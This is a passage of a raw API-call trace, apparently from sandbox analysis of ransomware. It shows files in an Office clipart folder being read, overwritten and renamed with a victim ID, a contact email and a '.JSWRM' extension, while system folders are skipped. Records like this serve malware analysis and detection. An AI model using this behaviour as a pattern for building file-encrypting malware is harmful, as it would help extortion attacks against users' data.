lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0097.800] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02413_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02413_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.801] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=96796) returned 1 [0097.801] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17a10) returned 0x24d210 [0097.802] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x17a10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x17a10, lpOverlapped=0x0) returned 1 [0097.810] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.810] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x17a10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x17a10, lpOverlapped=0x0) returned 1 [0097.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.811] CloseHandle (hObject=0x314) returned 1 [0097.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0097.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0097.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0097.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0097.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0097.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0097.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0097.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0097.812] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02413_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02413_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02413_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02413_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0097.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0097.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0097.813] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x670, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02431_.WMF", cAlternateFileName="")) returned 1 [0097.813] lstrcmpiW (lpString1="SO02431_.WMF", lpString2=".") returned 1 [0097.813] lstrcmpiW (lpString1="SO02431_.WMF", lpString2="..") returned 1 [0097.813] lstrcmpiW (lpString1="SO02431_.WMF", lpString2="...") returned 1 [0097.813] lstrcmpiW (lpString1="SO02431_.WMF", lpString2="windows") returned -1 [0097.813] lstrcmpiW (lpString1="SO02431_.WMF", lpString2="recovery") returned 1 [0097.813] lstrcmpiW (lpString1="SO02431_.WMF", lpString2="perflogs") returned 1 [0097.813] lstrcmpiW (lpString1="SO02431_.WMF", lpString2="documents and settings") returned 1 [0097.813] lstrcmpiW (lpString1="SO02431_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.813] lstrcmpiW (lpString1="SO02431_.WMF", lpString2="system volume information") returned -1 [0097.813] lstrcmpiW (lpString1="SO02431_.WMF", lpString2="msocache") returned 1 [0097.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0097.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02431_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02431_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02431_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0097.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0097.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02431_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02431_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02431_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0097.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0097.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0097.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0097.813] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02431_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02431_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.814] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1648) returned 1 [0097.814] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x670) returned 0x22d530 [0097.814] ReadFile (in: hFile=0x314, lpBuffer=0x22d530, nNumberOfBytesToRead=0x670, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesRead=0x345e89c*=0x670, lpOverlapped=0x0) returned 1 [0097.816] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.816] WriteFile (in: hFile=0x314, lpBuffer=0x22d530*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesWritten=0x345e898*=0x670, lpOverlapped=0x0) returned 1 [0097.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d530 | out: hHeap=0x1e0000) returned 1 [0097.816] CloseHandle (hObject=0x314) returned 1 [0097.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0097.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0097.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0097.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0097.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0097.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0097.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0097.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0097.816] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02431_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02431_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02431_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02431_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0097.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0097.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0097.817] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5b4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02437_.WMF", cAlternateFileName="")) returned 1 [0097.817] lstrcmpiW (lpString1="SO02437_.WMF", lpString2=".") returned 1 [0097.817] lstrcmpiW (lpString1="SO02437_.WMF", lpString2="..") returned 1 [0097.817] lstrcmpiW (lpString1="SO02437_.WMF", lpString2="...") returned 1 [0097.817] lstrcmpiW (lpString1="SO02437_.WMF", lpString2="windows") returned -1 [0097.817] lstrcmpiW (lpString1="SO02437_.WMF", lpString2="recovery") returned 1 [0097.817] lstrcmpiW (lpString1="SO02437_.WMF", lpString2="perflogs") returned 1 [0097.817] lstrcmpiW (lpString1="SO02437_.WMF", lpString2="documents and settings") returned 1 [0097.817] lstrcmpiW (lpString1="SO02437_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.817] lstrcmpiW (lpString1="SO02437_.WMF", lpString2="system volume information") returned -1 [0097.818] lstrcmpiW (lpString1="SO02437_.WMF", lpString2="msocache") returned 1 [0097.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0097.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02437_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02437_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02437_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0097.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0097.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02437_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02437_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02437_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0097.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0097.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0097.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0097.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02437_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02437_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.818] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1460) returned 1 [0097.818] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5b0) returned 0x2332c0 [0097.818] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x5b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x5b0, lpOverlapped=0x0) returned 1 [0097.820] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.820] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x5b0, lpOverlapped=0x0) returned 1 [0097.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0097.820] CloseHandle (hObject=0x314) returned 1 [0097.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0097.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0097.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0097.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0097.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0097.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0097.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0097.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0097.821] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02437_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02437_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02437_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02437_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0097.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0097.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0097.821] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x504, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02439_.WMF", cAlternateFileName="")) returned 1 [0097.822] lstrcmpiW (lpString1="SO02439_.WMF", lpString2=".") returned 1 [0097.822] lstrcmpiW (lpString1="SO02439_.WMF", lpString2="..") returned 1 [0097.822] lstrcmpiW (lpString1="SO02439_.WMF", lpString2="...") returned 1 [0097.822] lstrcmpiW (lpString1="SO02439_.WMF", lpString2="windows") returned -1 [0097.822] lstrcmpiW (lpString1="SO02439_.WMF", lpString2="recovery") returned 1 [0097.822] lstrcmpiW (lpString1="SO02439_.WMF", lpString2="perflogs") returned 1 [0097.822] lstrcmpiW (lpString1="SO02439_.WMF", lpString2="documents and settings") returned 1 [0097.822] lstrcmpiW (lpString1="SO02439_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.822] lstrcmpiW (lpString1="SO02439_.WMF", lpString2="system volume information") returned -1 [0097.822] lstrcmpiW (lpString1="SO02439_.WMF", lpString2="msocache") returned 1 [0097.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0097.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02439_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02439_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02439_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0097.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0097.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02439_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02439_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02439_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0097.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0097.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0097.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0097.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02439_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02439_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.823] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1284) returned 1 [0097.823] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x500) returned 0x230a00 [0097.823] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x500, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x500, lpOverlapped=0x0) returned 1 [0097.824] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.824] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x500, lpOverlapped=0x0) returned 1 [0097.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0097.824] CloseHandle (hObject=0x314) returned 1 [0097.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 